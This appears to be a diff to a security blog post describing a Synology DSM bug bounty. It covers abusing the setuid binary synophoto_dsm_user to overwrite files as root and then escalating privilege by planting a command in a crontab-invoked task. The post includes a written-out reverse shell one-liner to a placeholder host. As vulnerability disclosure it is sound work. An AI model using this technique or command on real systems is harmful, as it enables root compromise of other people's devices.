bamboofox/old-blog/source/_posts/Synology-Bug-Bounty-2016.md

 ## Vul-03: Read-Write Arbitrary Files
 ---
 After we got the shell, we continued to find security flaws in the DSM.
 The binary program `synophoto_dsm_user` got our attention.
 This binary is a **setuid program**, and has a powerful copy function.
-With the `--copy` parameter, it will do the `cp` command and **copy a file with the root permission**.
+With the `--copy root` parameter, it will do the `cp` command and **copy a file with the root permission**.
 This make us have the ability to read/write an arbitrary file .

 ## Vul-04: Privilege Escalation
 ---
-With the previous Vul-03, we can exploit the vulnerability and **escalate our privilege to root**.
+With the previous Vul-02 ( RCE ) and Vul-03 ( Read-Write Arbitrary Files ), we can exploit the vulnerability and **escalate our privilege to root**.
 We first tried modify the `/etc/crontab` file, but failed due to the [AppArmor](https://en.wikipedia.org/wiki/AppArmor) protection.
 So we change our target to the file that will be invoked by crontab.
 Finally we found `/tmp/synoschedtask`, a task which will be invoked by crontab as root.
 We use `synophoto_dsm_user` to modify its file content to the following command:
 ```
 /volume1/photo/bash -c '/volume1/photo/bash -i >& /dev/tcp/x.x.x.x/yyyyy 0>&1'
 ```